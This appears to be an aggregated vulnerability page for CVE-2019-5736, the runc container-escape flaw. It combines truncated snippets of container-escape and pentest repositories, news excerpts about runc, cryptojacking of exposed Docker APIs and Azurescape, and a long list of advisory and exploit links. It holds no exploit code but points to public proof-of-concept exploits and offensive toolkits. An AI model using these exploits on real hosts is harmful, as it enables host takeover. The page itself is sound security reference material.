Awesome Container Escape Collections of container escape techniques Container Escape Techniques Name Type Info Status CVE-2016-5195 vuln/kernel CVE-2020-14386 vuln/kernel CVE-2018-15664 vuln/docker CVE-2019-14271 vuln/docker CVE-2019-5736 vuln/runc CVE-2017-1002101 vuln/k8s CVE-2018-1002105 vuln/k8s CVE-2020-8558 vuln/k8s CVE-2020-15257 v

Underground Nexus deployment Current version 080 Features that are missing: Minio is not being used right now because Minio has a conflicting port 9000 with Portainer Future plan to redirect port usage or take away port 9000 on Portainer There isn't the best bash script to check for logic on when there are certain resources that are already available A cli tool is c

《云原生安全:攻防实践与体系构建》资料仓库 本仓库提供了《云原生安全:攻防实践与体系构建》一书的补充材料和随书源码,供感兴趣的读者深入阅读、实践。 本仓库所有内容仅供教学、研究使用,严禁用于非法用途,违者后果自负! 补充阅读资料 100_云计算简介pdf 101_代码安全p

《云原生安全:攻防实践与体系构建》资料仓库 本仓库提供了《云原生安全:攻防实践与体系构建》一书的补充材料和随书源码,供感兴趣的读者深入阅读、实践。 本仓库所有内容仅供教学、研究使用,严禁用于非法用途,违者后果自负! 相关链接:豆瓣 | 京东 | 当当 补充阅读资

中文 | English 1 Introduction Metarget = meta- + target, a framework providing automatic constructions of vulnerable infrastructures, used to deploy simple or complicated vulnerable cloud native targets swiftly and automatically 11 Why Metarget? During security researches, we might find that the deployment of vulnerable environment often takes much time, while the time spen

PenetrationTesting English Version Github的Readme显示不会超过4000行,而此Repo添加的工具和文章近万行,默认显示不全。当前页面是减配版:工具星数少于200且500天内没更新的不在此文档中显示。 点击这里查看完整版:中文-完整版 目录 工具 新添加的 (854) 新添加的 未分类 人工智能&&a

OSCP Cheat Sheet Commands, Payloads and Resources for the Offensive Security Certified Professional Certification Resources Basics Tool URL Swaks githubcom/jetmore/swaks CyberChef gchqgithubio/CyberChef/ Information Gathering Tool URL Amass githubcom/OWASP/Amass AutoRecon githubcom/Tib3rius/AutoRecon Sparta gi

Free Download ControlPlane is sponsoring the first four chapters of the book, download them for free Hacking Kubernetes Running cloud native workloads on Kubernetes can be challenging: keeping them secure is even more so Kubernetes' complexity offers malicious in-house users and external attackers alike a large assortment of attack vectors In this book, Andrew Martin an

hacking tools awesome lists

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASP Arduino Assembly AutoHotkey AutoIt Batchfile Boo C C# C++ CMake CSS CoffeeScript Dart Dockerfile Emacs Lisp Erlang Game Maker Language Go HTML Haskell Java JavaScript Jupyter Notebook KiCad Kotlin Logos Lua M Makefile Markdown Mask Max Nginx OCaml Objective-C Objective-C++ Others PHP PLSQL P

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASL ASP ASPNET ActionScript Arduino Assembly AutoHotkey Batchfile BitBake Boo C C# C++ CMake CSS Classic ASP CoffeeScript Dart Dockerfile Emacs Lisp Erlang F# Go HCL HTML Haskell Java JavaScript Jupyter Notebook KiCad Kotlin Logos Lua M Makefile Markdown Mask Max Nginx Nim OCaml Objective-C Obj

Awesome Cloud Native Security This repository is used to collect AWESOME resources on the topic of cloud native security found during research Note: All resources will be suffixed and ordered by date of conferences, blogs or other formats of publication, if applicable Resources in sub-list are related to their parent entries For simplicity, resources would NOT be duplicat

PenetrationTesting English Version Github的Readme显示不会超过4000行,而此Repo添加的工具和文章近万行,默认显示不全。当前页面是减配版:工具星数少于200且500天内没更新的不在此文档中显示。 点击这里查看完整版:中文-完整版 目录 工具 新添加的 (854) 新添加的 未分类 人工智能&&a

Awesome Cloud Native Security This repository is used to collect AWESOME resources on the topic of cloud native security found during research Note: All resources will be suffixed and ordered by date of conferences, blogs or other formats of publication, if applicable Resources in sub-list are related to their parent entries For simplicity, resources would NOT be duplicat

IoT CVE The following repository represents an abnormal data collection strategy for a security system in IoT Based on a detailed risk assessment and collaboration with domain experts, the data collection framework should analyze patterns to spot potential threats and points of failure Obtaining valid, representative, and accurate data that reflects the context and environme

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASL (1) ASPNET (1) ActionScript (1) Arduino (2) Assembly (7) AutoHotkey (2) Batchfile (16) BitBake (5) Boo (1) C (286) C# (212) C++ (225) CMake (2) CSS (66) Classic ASP (2) Clojure (1) CoffeeScript (1) ColdFusion (1) Dart (1) Dockerfile (37) Emacs Lisp (1) Erlang (1) F# (2) Go (531) HCL (4)

DevSecOps Kubernetes Playground (aka "A Hacker's Guide to Kubernetes") Note: Based on k8s Security HOWTO Prerequisite: Setup Pentest Infrastructure/Environment: Kubernetes kubeadm-based setup with terraform + ansible on ProxMox (pfSense VM as Firewall/VPN/LB + k8s nodes VMs) Objective: Kubernetes has historically not been security hardened out of the box! (defaul

平常看到好的各种工具的集合

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASP ActionScript Arduino Assembly AutoHotkey Batchfile BitBake Boo C C# C++ CMake CSS CoffeeScript Dart Dockerfile Emacs Lisp Erlang F# Game Maker Language Go HCL HTML Haskell Java JavaScript Jupyter Notebook KiCad Kotlin Logos Lua M Makefile Markdown Mask Max Nginx Nim OCaml Objective-C Objecti

DevSecOps Kubernetes Playground (aka "A Hacker's Guide to Kubernetes") Based on Cloud-Native & Kubernetes Security HOWTO Prerequisite: Setup Pentest Infrastructure/Environment: Kubernetes kubeadm-based setup with terraform + ansible on ProxMox (pfSense VM as Firewall/VPN/LB + k8s nodes VMs) Objective: Kubernetes has historically not been security hardened

项目简介 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、擦痕迹。 安全相关资源列表 arxivorg 康奈尔大学(Cornell University)开放文档 githubcom/sindresorhus/awesome awesome系列 wwwowasporgcn/owasp-pr

DevSecOps Kubernetes Playground ("A Hacker's Guide to Kubernetes") Based on Cloud-Native & Kubernetes Security HOWTO Tech Stack: Proxmox/pfSense/Ansible/Packer/Terraform/Kubernetes: kubeadm-based & KIND/Docker/etc Prerequisite: (DEFAULT DevSecOps ENV) Pentest Infrastructure/Environment (On-Prem Kubernetes Cluster): Kubernetes kubeadm-based setup

PoC in GitHub 2021 CVE-2021-1056 (2021-01-07) NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidiako) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure pokerfaceSad/CVE-2021-1056 CVE-2021-

Recent Articles

Rethinking Cyber-Defense Strategies in the Public-Cloud Age
Threatpost • Lisa Vaas • 19 Apr 2022

The pandemic has fast-tracked migration to the public cloud, including Amazon Web Services, Google Compute Platform and Microsoft Azure. But the journey hasn’t exactly been smooth as silk: The great migration has brought a raft of complex security challenges, which have led to headline-grabbing data exposures and more. Misconfigurations and a lack of visibility into cloud assets and inventory are the biggest culprits for public-cloud insecurity. Thankfully, there are approaches that can help.<...

Public Clouds & Shared Responsibility: Lessons from Vulnerability Disclosure
Threatpost • Oliver Tavakoli • 26 Oct 2021

The inexorable movement of data and applications to the cloud that began several years ago and accelerated during the pandemic shows no signs of slowing down. The rationale for this transformation is driven by a desire to outsource non-critical functions (building and maintaining data centers, running and patching standard software packages) and to achieve business agility (scaling up, the ability to rapidly shift focus in light of market conditions).
Some of this migration is to public cl...

Exposed Docker APIs Abused by DDoS, Cryptojacking Botnet Malware
BleepingComputer • Sergiu Gatlan • 14 Jun 2019

Attackers are actively scanning for exposed Docker APIs on port 2375 and use them to deploy a malicious payload which drops a Dofloo Trojan variant, a malware known as a popular tool for building large scale botnets.
The Dofloo (aka AESDDoS) malware was first
[
,
,
,
] and it is known for allowing hackers to quickly assemble vast numbers of compromised machines used to create botnets that can launch DDoS attacks and — in the case of some variants —...

Compromised Docker Hosts Use Shodan to Infect More Victims
BleepingComputer • Sergiu Gatlan • 30 May 2019

Hackers are scanning for Docker hosts with exposed APIs to use them for cryptocurrency mining by deploying malicious self-propagating Docker images infected with Monero miners and scripts that make use of Shodan to find other vulnerable targets.
The cryptojacking campaign targeting exposed Docker hosts was unearthed by Trend Micro researchers after a Docker image containing a Monero (XMR) cryptocurrency miner binary was deployed on one of their honeypots.
This type of attack is defi...

Vulnerable Docker Hosts Actively Abused in Cryptojacking Campaigns
BleepingComputer • Sergiu Gatlan • 04 Mar 2019

Hundreds of vulnerable and exposed Docker hosts are being abused in cryptojacking campaigns after being compromised with the help of exploits designed to take advantage of the CVE-2019-5736 runc vulnerability discovered last month.
The
 triggers a container escape and it allows potential attackers to access the host filesystem upon execution of a malicious container, overwrite the runc binary present on the system, and run arbitrary commands on the container's host system.
...

Major Container Security Flaw Threatens Cascading Attacks
Threatpost • Tara Seals • 12 Feb 2019

runc, a building-block project for the container technologies used by many enterprises as well as public cloud providers, has patched a vulnerability that would allow root-level code-execution, container escape and access to the host filesystem.
Discovered by researchers Adam Iwaniuk and Borys Popławski, the vulnerability (CVE-2019-5736) “allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host,”...

Patch this run(DM)c Docker flaw or you be illin'... Tricky containers can root host boxes. It's like that – and that's the way it is
The Register • Thomas Claburn in San Francisco • 11 Feb 2019

'Doomsday scenario' unless devops crowd walks this way

Aleksa Sarai, a senior software engineer at SUSE Linux GmbH, has disclosed a serious vulnerability affecting runc, the default container runtime for Docker, containerd, Podman, and CRI-O.
"While there are very few incidents that could qualify as a doomsday scenario for enterprise IT, a cascading set of exploits affecting a wide range of interconnected production systems qualifies...and that’s exactly what this vulnerability represents," said Scott McCarty, principal product manager for c...

RunC Vulnerability Gives Attackers Root Access on Docker, Kubernetes Hosts
BleepingComputer • Sergiu Gatlan • 11 Feb 2019

A container breakout security flaw found in the runc container runtime allows malicious containers (with minimal user interaction) to overwrite the host runc binary and gain root-level code execution on the host machine.
 is an open source command line utility designed to spawn and run containers and, at the moment, it is used as the default runtime for containers with Docker, containerd, Podman, and CRI-O.
According to Aleksa Sarai, Senior Software Engineer (Containers) SUSE Li...

Patch this run(DM)c Docker flaw or you be illin'... Tricky containers can root host boxes. It's like that – and that's the way it is
The Register • Thomas Claburn in San Francisco • 11 Feb 2019

'Doomsday scenario' unless devops crowd walks this way Docker invites elderly Windows Server apps to spend remaining days in supervised care

Aleksa Sarai, a senior software engineer at SUSE Linux GmbH, has disclosed a serious vulnerability affecting runc, the default container runtime for Docker, containerd, Podman, and CRI-O.
"While there are very few incidents that could qualify as a doomsday scenario for enterprise IT, a cascading set of exploits affecting a wide range of interconnected production systems qualifies...and that’s exactly what this vulnerability represents," said Scott McCarty, principal product manager for c...

Microsoft fixes bug letting hackers take over Azure containers
BleepingComputer • Ionut Ilascu • 01 Jan 1970

Microsoft has fixed a vulnerability in Azure Container Instances called Azurescape that allowed a malicious container to take over containers belonging to other customers on the platform.
An adversary exploiting Azurescape could execute commands in the other users' containers and gain access to all their data deployed to the platform, the researchers say.
Microsoft has notified customers that were potentially impacted by Azurescape to change privileged credentials for containers depl...

References

CWE-78https://www.openwall.com/lists/oss-security/2019/02/11/2https://github.com/opencontainers/runc/commit/6635b4f0c6af3810594d2770f662f34ddc15b40dhttps://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558bhttps://github.com/docker/docker-ce/releases/tag/v18.09.2https://access.redhat.com/security/vulnerabilities/runcescapehttps://access.redhat.com/security/cve/cve-2019-5736https://www.twistlock.com/2019/02/11/how-to-mitigate-cve-2019-5736-in-runc-and-docker/https://github.com/rancher/runc-cvehttps://cloud.google.com/kubernetes-engine/docs/security-bulletins#february-11-2019-runchttps://brauner.github.io/2019/02/12/privileged-containers.htmlhttps://aws.amazon.com/security/security-bulletins/AWS-2019-002/https://access.redhat.com/errata/RHSA-2019:0304https://access.redhat.com/errata/RHSA-2019:0303https://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/https://www.exploit-db.com/exploits/46359/http://www.securityfocus.com/bid/106976https://www.exploit-db.com/exploits/46369/https://github.com/q3k/cve-2019-5736-pochttps://github.com/Frichetten/CVE-2019-5736-PoChttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runchttps://www.synology.com/security/advisory/Synology_SA_19_06https://access.redhat.com/errata/RHSA-2019:0401https://access.redhat.com/errata/RHSA-2019:0408https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03913en_ushttps://security.netapp.com/advisory/ntap-20190307-0008/https://lists.apache.org/thread.html/b162dd624dc088cd634292f0402282a1d1d0ce853baeae8205bc033c@%3Cdev.mesos.apache.org%3Ehttps://lists.apache.org/thread.html/a258757af84c5074dc7bf932622020fd4f60cef65a84290380386706@%3Cuser.mesos.apache.org%3Ehttp://www.openwall.com/lists/oss-security/2019/03/23/1https://bugzilla.suse.com/show_bug.cgi?id=1121967https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.htmlhttps://support.mesosphere.com/s/article/Known-Issue-Container-Runtime-Vulnerability-MSPH-2019-0003http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00044.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-04/msg00074.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-04/msg00091.htmlhttps://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6A4OSFM5GGOWW4ECELV5OHX2XRAUSPH/https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SWFJGIPYAAAMVSWWI3QWYXGA3ZBU2H4W/https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/KM03410944https://access.redhat.com/errata/RHSA-2019:0975https://azure.microsoft.com/en-us/updates/iot-edge-fix-cve-2019-5736/https://azure.microsoft.com/en-us/updates/cve-2019-5736-and-runc-vulnerability/https://lists.apache.org/thread.html/acacf018c12636e41667e94ac0a1e9244e887eef2debdd474640aa6e@%3Cdev.dlab.apache.org%3Ehttps://lists.apache.org/thread.html/a585f64d14c31ab393b90c5f17e41d9765a1a17eec63856ce750af46@%3Cdev.dlab.apache.org%3Ehttp://lists.opensuse.org/opensuse-security-announce/2019-05/msg00060.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-05/msg00073.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-06/msg00011.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-06/msg00015.htmlhttp://www.openwall.com/lists/oss-security/2019/06/28/2http://www.openwall.com/lists/oss-security/2019/07/06/4http://www.openwall.com/lists/oss-security/2019/07/06/3https://usn.ubuntu.com/4048-1/http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00084.htmlhttps://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLC52IOJN6IQJWJ6CUI6AIUP6GVVG2QP/https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EGZKRCKI3Y7FMADO2MENMT4TU24QGHFR/https://lists.apache.org/thread.html/24e54e3c6b2259e3903b6b8fe26896ac649c481ea99c5739468c92a3@%3Cdev.dlab.apache.org%3Ehttp://lists.opensuse.org/opensuse-security-announce/2019-10/msg00007.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-10/msg00029.htmlhttp://www.openwall.com/lists/oss-security/2019/10/24/1http://www.openwall.com/lists/oss-security/2019/10/29/3https://security.gentoo.org/glsa/202003-21https://lists.apache.org/thread.html/rc494623986d76593873ce5a40dd69cb3629400d10750d5d7e96b8587@%3Cdev.dlab.apache.org%3Ehttps://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3Ehttp://packetstormsecurity.com/files/163339/Docker-Container-Escape.htmlhttp://packetstormsecurity.com/files/165197/Docker-runc-Command-Execution-Proof-Of-Concept.htmlhttps://access.redhat.com/errata/RHSA-2019:0304https://tools.cisco.com/security/center/viewAlert.x?alertId=59636https://usn.ubuntu.com/4048-1/https://www.exploit-db.com/exploits/46369https://nvd.nist.govhttps://www.securityfocus.com/bid/106976